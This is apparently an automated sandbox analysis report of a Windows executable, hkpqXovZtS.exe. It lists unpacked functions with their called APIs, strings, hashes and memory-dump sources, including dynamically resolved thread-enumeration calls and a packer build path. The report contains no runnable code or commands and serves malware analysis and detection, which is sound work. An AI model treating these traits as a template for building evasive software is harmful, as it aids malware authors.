Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CreateToolhelp32Snapshot$kernel32
API String ID: 1646373207-1978853013
Opcode ID: 31775dff4cce7a8f0ce94ab8fe9dfc6b179b7d7bd8dbfccd05a346d303f3f9d0
Instruction ID: 521447b33275374e385ebe5b8164c2d0ac973982be96c8a4c7dac89382b42092
Opcode Fuzzy Hash: 31775dff4cce7a8f0ce94ab8fe9dfc6b179b7d7bd8dbfccd05a346d303f3f9d0
Instruction Fuzzy Hash: C8B092B4DD1750ABBA16EBE1FD0EA843BA4AE047423000CE0F116C220CCAB454A4EA20

Function 0229101D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,Thread32First), ref: 02291027
GetProcAddress.KERNEL32(00000000), ref: 0229102E

Strings

Thread32First, xrefs: 0229101D
kernel32, xrefs: 02291022

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Thread32First$kernel32
API String ID: 1646373207-3474519427
Opcode ID: 070c71a9a653d8eb1349f4ee234bfd6b9f1ee4c5d653773eece91362bff357b0
Instruction ID: d578ed50840aec8f092498560eee6b49feb8b4f78f6da6c1033ff5a40eaa4917
Opcode Fuzzy Hash: 070c71a9a653d8eb1349f4ee234bfd6b9f1ee4c5d653773eece91362bff357b0
Instruction Fuzzy Hash: 84B09BB4DD07509BAB16DBE0F80D64437547D047413004CD0F003D1108C7B45450D620

Function 022A9E8F Relevance: 6.3, APIs: 4, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 022A9F19

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 3e8bb2535b3587f86e413b8bbbf74e9bac5d94f35c1fcc6b0da8d3a021669034
Instruction ID: 63591770990809896479e5a1f9e6be9c04949491de7fefcad084e0ce537f3b53
Opcode Fuzzy Hash: 3e8bb2535b3587f86e413b8bbbf74e9bac5d94f35c1fcc6b0da8d3a021669034
Instruction Fuzzy Hash: B6B15A729203469FDB11CFA8C8617EEBBF5EF49340F1441AAE844DB749D7358941CB60

Function 00423827 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042385B
__isleadbyte_l.LIBCMT ref: 0042388F
MultiByteToWideChar.KERNEL32(00000080,00000009,00419D04,?,00000000,00000000,?,?,?,?,00419D04,00000000,?), ref: 004238C0
MultiByteToWideChar.KERNEL32(00000080,00000009,00419D04,00000001,00000000,00000000,?,?,?,?,00419D04,00000000,?), ref: 0042392E

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 042690790a702fefc08f964d4e542dfc4fc000c719496b40dc043e4ee01e18d7
Instruction ID: 21456864923b4facc1ed4bd021b79ca697cce5d2714590c87d5377225e0da7ae
Opcode Fuzzy Hash: 042690790a702fefc08f964d4e542dfc4fc000c719496b40dc043e4ee01e18d7
Instruction Fuzzy Hash: F531E030B00265EFCB20EF64D8809BA3BF5AF01312B95456EF0659F291E738DE40DB58

Function 022AACEC Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 022AB2CF: _free.LIBCMT ref: 022AB2DD

Part of subcall function 022ABC7F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,022AF8E0,?,00000000,00000000), ref: 022ABD2B

GetLastError.KERNEL32 ref: 022AAD54
__dosmaperr.LIBCMT ref: 022AAD5B
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 022AAD9A
__dosmaperr.LIBCMT ref: 022AADA1

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 64463d7a1881c0bf3c9a134e69fa865c58bd420071e30ebf613034651cc630a0
Instruction ID: 1ce78e498f3e4dc613bb6a3708a942c5cda1fc8a54655065ef3b79e8c5640cdc
Opcode Fuzzy Hash: 64463d7a1881c0bf3c9a134e69fa865c58bd420071e30ebf613034651cc630a0
Instruction Fuzzy Hash: 0821FB71920706AFDB20AFE58CA0D6BB77EEF113657008515F9A987A44DB70DC40CB60

Function 022A761A Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000004,022A142A,?,?,00000000,?,022A15AA,00000000,0000003F,022E4FE0,00000218,00000000,?,00000000), ref: 022A761F
_free.LIBCMT ref: 022A767C
_free.LIBCMT ref: 022A76B2
SetLastError.KERNEL32(00000000,022E37F8,000000FF,?,022A15AA,00000000,0000003F,022E4FE0,00000218,00000000,?,00000000,?,0229187C,?,022E4FE0), ref: 022A76BD

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a914af90399ad856648f29fa9b27223f1c790f12e8a0cdf3514c1c1faa0c24ec
Instruction ID: c27276fa035d6a03841b5722719af496f737c9c0d4a7830f32e55ede1d19eb38
Opcode Fuzzy Hash: a914af90399ad856648f29fa9b27223f1c790f12e8a0cdf3514c1c1faa0c24ec
Instruction Fuzzy Hash: 46112772A70306BF9A1176FDAC69F3F669B9BC1B757150A34E6218798CDF7088004519

Function 022A7771 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0000003F,022A72A2,022A7A5B,?,?,022A6300), ref: 022A7776
_free.LIBCMT ref: 022A77D3
_free.LIBCMT ref: 022A7809
SetLastError.KERNEL32(00000000,022E37F8,000000FF,?,0000003F,022A72A2,022A7A5B,?,?,022A6300), ref: 022A7814

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 81b62f1ecc9db661dbf12c126981d8e60be821f515d98f9c1619f122a8007f4b
Instruction ID: 4a1899f9fb5d64c3ba25fa4d6c286b5fd5c39025e29f2fa3255a00957a5c1f62
Opcode Fuzzy Hash: 81b62f1ecc9db661dbf12c126981d8e60be821f515d98f9c1619f122a8007f4b
Instruction Fuzzy Hash: 8D118C32A20302BFDA1162F9ACA9EBF659BEBC13757110A34F524C7DDCCF3088019915

Function 004123B9 Relevance: 6.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0041223E: _memset.LIBCMT ref: 00412258

_memset.LIBCMT ref: 004123EF
_memset.LIBCMT ref: 00412402
_memset.LIBCMT ref: 00412442
_memset.LIBCMT ref: 00412455

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 56e3596244b019aad0908a58faf1161aab741b7a7a5553556bd0c1b3ef89820c
Instruction ID: 4f4fbd7a9ddfec2a2fb24fe9caf3cb8edf7fea1afd137dd2aa8bbddc97867cbc
Opcode Fuzzy Hash: 56e3596244b019aad0908a58faf1161aab741b7a7a5553556bd0c1b3ef89820c
Instruction Fuzzy Hash: 6411AF7164878069E320D67A4C41FD3B6DCAB14308F44482FF2DEC7183C5A9B844C75A

Function 00420F6D Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00420F79

Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81

__amsg_exit.LIBCMT ref: 00420F99
InterlockedDecrement.KERNEL32(?), ref: 00420FC6
InterlockedIncrement.KERNEL32(029116B8), ref: 00420FF1

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd
String ID:
API String ID: 2662827482-0
Opcode ID: c28fd5e4974021c0b2283220e6bf28cee5fcfdaac05ab9c884593042acb2e77e
Instruction ID: af634492993cffa530780a9e7b3d80f1476467ed148b9b1876f32b96ba5f2773
Opcode Fuzzy Hash: c28fd5e4974021c0b2283220e6bf28cee5fcfdaac05ab9c884593042acb2e77e
Instruction Fuzzy Hash: 3701A531B40731DBC731AF26A50579A73A0BF04764F86011BE804A3792CB6C6D82CBCD

Function 0041156D Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00411575
_wcslen.LIBCMT ref: 00411586
_wcslen.LIBCMT ref: 00411596
_wcslen.LIBCMT ref: 004115A4

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 2e76471e46b784bcd47bfc70dfd3cf1da2e07dbfe565d898becf4de2a066c2b6
Instruction ID: e270e476de3c1ec06836dde21fac0c35e7c2663837c2c34f8248c8bd2ee52518
Opcode Fuzzy Hash: 2e76471e46b784bcd47bfc70dfd3cf1da2e07dbfe565d898becf4de2a066c2b6
Instruction Fuzzy Hash: 17F090321880987EDF126A52AC01DEE3B17DFC13B5B20442BFA1A89071CA75899296D9

Function 022AFE17 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,5B5E5FCC,00000000,00000000,00000000,?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000), ref: 022AFE2E
GetLastError.KERNEL32(?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000,?,00000000,?,022A98FC,?), ref: 022AFE3A

Part of subcall function 022AFE00: CloseHandle.KERNEL32(022E3F80,022AFE4A,?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000,?,00000000), ref: 022AFE10

___initconout.LIBCMT ref: 022AFE4A

Part of subcall function 022AFDC2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,022AFDF1,022AD048,00000000,?,022A93B0,?,5B5E5FC0,00000000,?), ref: 022AFDD5

WriteConsoleW.KERNEL32(00000000,5B5E5FCC,00000000,00000000,?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000,?), ref: 022AFE5F

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 016b074d8f419dbdf4d8b4e97c42f1a404a9a21ab2f777bd8b2ab0eab692b908
Instruction ID: b84c83d855ade3335032d698b4c550fc2e85c25e00a88eebdfb74efb475456a9
Opcode Fuzzy Hash: 016b074d8f419dbdf4d8b4e97c42f1a404a9a21ab2f777bd8b2ab0eab692b908
Instruction Fuzzy Hash: 7FF01236D90119BBCF125FD5ED08A993F67EF043A1B144850FE0885915CB3388309B91

Function 00402695 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 380COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00402977

Strings

;%u, xrefs: 00402965

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _swprintf
String ID: ;%u
API String ID: 589789837-535004727
Opcode ID: db72ed3bbf2784d8f6e5250f4806be385413e5ba2274cb924b5fe3bc1e9b7501
Instruction ID: 89149018f494bd67844e030287b596fcff0793991f3e13e9877155906b78348b
Opcode Fuzzy Hash: db72ed3bbf2784d8f6e5250f4806be385413e5ba2274cb924b5fe3bc1e9b7501
Instruction Fuzzy Hash: EBD1C1702003458BCB25EF758699BEE77E6AB44304F14043FE896A72D2DBBCA885C759

Function 022AB988 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

Part of subcall function 022AB523: GetOEMCP.KERNEL32(00000000,022AB794,022E4FE0,00000000,022A15AA,022A15AA,00000000,0000003F,022E4FE0), ref: 022AB54E

IsValidCodePage.KERNEL32(-00000030,00000000,?,0000003F,?,?,022AB7DB,0000003F,00000000,022E4FE0,?,0000003F,?,?,?,022A15AA), ref: 022AB9E6
GetCPInfo.KERNEL32(00000000,022AB7DB,?,?,022AB7DB,0000003F,00000000,022E4FE0,?,0000003F,?,?,?,022A15AA,00000000,0000003F), ref: 022ABA28

Strings

kL, xrefs: 022AB990

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: CodeInfoPageValid
String ID: kL
API String ID: 546120528-2496334608
Opcode ID: cffe7d479b63fbed0e473292444c8b5d6b76745ded7fc4c781b0f808ba931b75
Instruction ID: 9267b1dca8fcb94ace1d891bf8f993824f5e8b17ee3d1bc2595f48a1223400d0
Opcode Fuzzy Hash: cffe7d479b63fbed0e473292444c8b5d6b76745ded7fc4c781b0f808ba931b75
Instruction Fuzzy Hash: AB510070A203469FDB20CFF5C8607BABBE5EF60308F14446ED4968BA5AE7789545CF90

Function 00409B7B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00409BA8
_wcslen.LIBCMT ref: 00409CA3

Strings

__rar_, xrefs: 00409CDA

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcslen
String ID: __rar_
API String ID: 176396367-2561138058
Opcode ID: 3896815ce97ef4378273e3231c49e3ce8c5a488d6a37778389609702c25cb7e7
Instruction ID: 923240a6723380f63c1d5be854d10b1f9689e3bb845e12124714b01cce9789b4
Opcode Fuzzy Hash: 3896815ce97ef4378273e3231c49e3ce8c5a488d6a37778389609702c25cb7e7
Instruction Fuzzy Hash: 3E412472A0424966DF20AA64CC85EEF37ADAF44354F04047BF90AB72D3D63CDD80CA68

Function 022AB5F9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(E8458D00,?,022E4FEC,022E4FE0,00000000), ref: 022AB62B

Strings

, xrefs: 022AB670
kL, xrefs: 022AB604

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: Info
String ID: $kL
API String ID: 1807457897-2183359600
Opcode ID: 81d437c5a6565be930bb358290e92a5900ec6bdd93d9e89b76f2ee95315ec125
Instruction ID: 3986a97b7945a5b583e21f5968d4e4290cbef74870a544c6a400bfa6d0843935
Opcode Fuzzy Hash: 81d437c5a6565be930bb358290e92a5900ec6bdd93d9e89b76f2ee95315ec125
Instruction Fuzzy Hash: 85415BB15143489BDB218EA8CDA4FF6BBFDAB2570CF1408EDD5CA87446D3B59A44CB20

Function 022A5CFC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\hkpqXovZtS.exe, xrefs: 022A5D3F, 022A5D46, 022A5D7C

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\hkpqXovZtS.exe
API String ID: 0-979263065
Opcode ID: 69ee112c393c9f27e71937af3eeeac36533c614cb3eefada0b23304cdfeaa6a0
Instruction ID: 7e691c345e83733ff46660929bdd55f3705e412da46959ad71aea08f3c1623ce
Opcode Fuzzy Hash: 69ee112c393c9f27e71937af3eeeac36533c614cb3eefada0b23304cdfeaa6a0
Instruction Fuzzy Hash: 2F41A271E20715ABCB21EFD9D9949AFBBF9EB85710B5000A6F404DB608D7708A51CB90

Function 022AA8C9 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof.LIBCMT ref: 022AA99F

Strings

kL, xrefs: 022AA8D1
D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022AA8DB

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: __cftof
String ID: D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c$kL
API String ID: 1622813385-2230753697
Opcode ID: caface90ff769e8e22702369ad4f9686e96a4655bf1cb44644302c6535ee7a5f
Instruction ID: fca7d8a5c4ee68071adf75dcbc6642e3a641bf3a268188e33f0c144d88d79529
Opcode Fuzzy Hash: caface90ff769e8e22702369ad4f9686e96a4655bf1cb44644302c6535ee7a5f
Instruction Fuzzy Hash: FD318E325303126FC72966F8AC6597EB379AE42730721025FE4229B8D5FF24D883CA90

Function 022A9622 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,022A9961,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3), ref: 022A970B
GetLastError.KERNEL32(022A9961,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3,?,89018BEA,?,418B0446,5B5E5FC0), ref: 022A973B

Strings

kL, xrefs: 022A9631

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: kL
API String ID: 442123175-2496334608
Opcode ID: 61a23f5a6b74446bc09bcc1b01fef62f1265c00a34cd4f65ee584c000f0883c4
Instruction ID: 0cef9d651dde0262f0cbd5e54401ffebdf7dbbaf878773cf81061036cb58cbb4
Opcode Fuzzy Hash: 61a23f5a6b74446bc09bcc1b01fef62f1265c00a34cd4f65ee584c000f0883c4
Instruction Fuzzy Hash: 68319271A10219AFDB14CFA9DC91BEAB3A9AF44304F0444A9E905D7694DB70EEC0CB60

Function 022AC792 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,E8458D00), ref: 022AC862
__freea.LIBCMT ref: 022AC86B

Part of subcall function 022A798A: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 022A79BC

Strings

kL, xrefs: 022AC79A

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: AllocateHeapStringType__freea
String ID: kL
API String ID: 4073780324-2496334608
Opcode ID: 1998b69309f3c52133120a00d1f47036cfc9566080c0ef98b50d153d1317182f
Instruction ID: 270fe9bb84f0dad0425bc10581d02e0d9e2de975f354920e68612bca16df39e0
Opcode Fuzzy Hash: 1998b69309f3c52133120a00d1f47036cfc9566080c0ef98b50d153d1317182f
Instruction Fuzzy Hash: 2631D271D10206AFDF229FA4CC54EAFBBAAFF44310F454166EC14AB658DB308951CB90

Function 022A9539 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,5B5E5FC0,00000000,?,?,022A9951,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000), ref: 022A95E3
GetLastError.KERNEL32(?,022A9951,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3,?,89018BEA,?,418B0446), ref: 022A9609

Strings

kL, xrefs: 022A9548

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: kL
API String ID: 442123175-2496334608
Opcode ID: 3ffae679a0b7401ad1d234173eb96d460c1091c13eadf6f65fdc89e650b4a8d3
Instruction ID: 0d6190a15d5ae4f771f01f84c31a08ff2f54ace2f5243b81bb98610eb64d8fde
Opcode Fuzzy Hash: 3ffae679a0b7401ad1d234173eb96d460c1091c13eadf6f65fdc89e650b4a8d3
Instruction Fuzzy Hash: BA218F71E102199BCB14CFAAD8919A9B3B9AF48315B1445AAE909DB254E730DE81CEA0

Function 022A945E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,5B5E5FC0,00000000,?,?,022A9971,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000), ref: 022A94FA
GetLastError.KERNEL32(?,022A9971,?,00000000,5B5E5FC0,00000000,5B5E5FCC,00000000,00000000,D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c,?,74C985C3,?,89018BEA,?,418B0446), ref: 022A9520

Strings

kL, xrefs: 022A946D

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: kL
API String ID: 442123175-2496334608
Opcode ID: baf27f826e25c8e37fba7abff972467402a3fcf4dacd894ee7f97942c7ddde45
Instruction ID: 0938c72d5f6b4bf48112d9bc282bd131e97eb82354b50ba1116e7f92364baa2d
Opcode Fuzzy Hash: baf27f826e25c8e37fba7abff972467402a3fcf4dacd894ee7f97942c7ddde45
Instruction Fuzzy Hash: 6721B134E102199FCF19CFAAD890AEDB7B9EF49305F1444A9EA06D7204D630DE82CF60

Function 0229F2BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0229F2FF
___raise_securityfailure.LIBCMT ref: 0229F3E7

Strings

kL, xrefs: 0229F3C8

Memory Dump Source

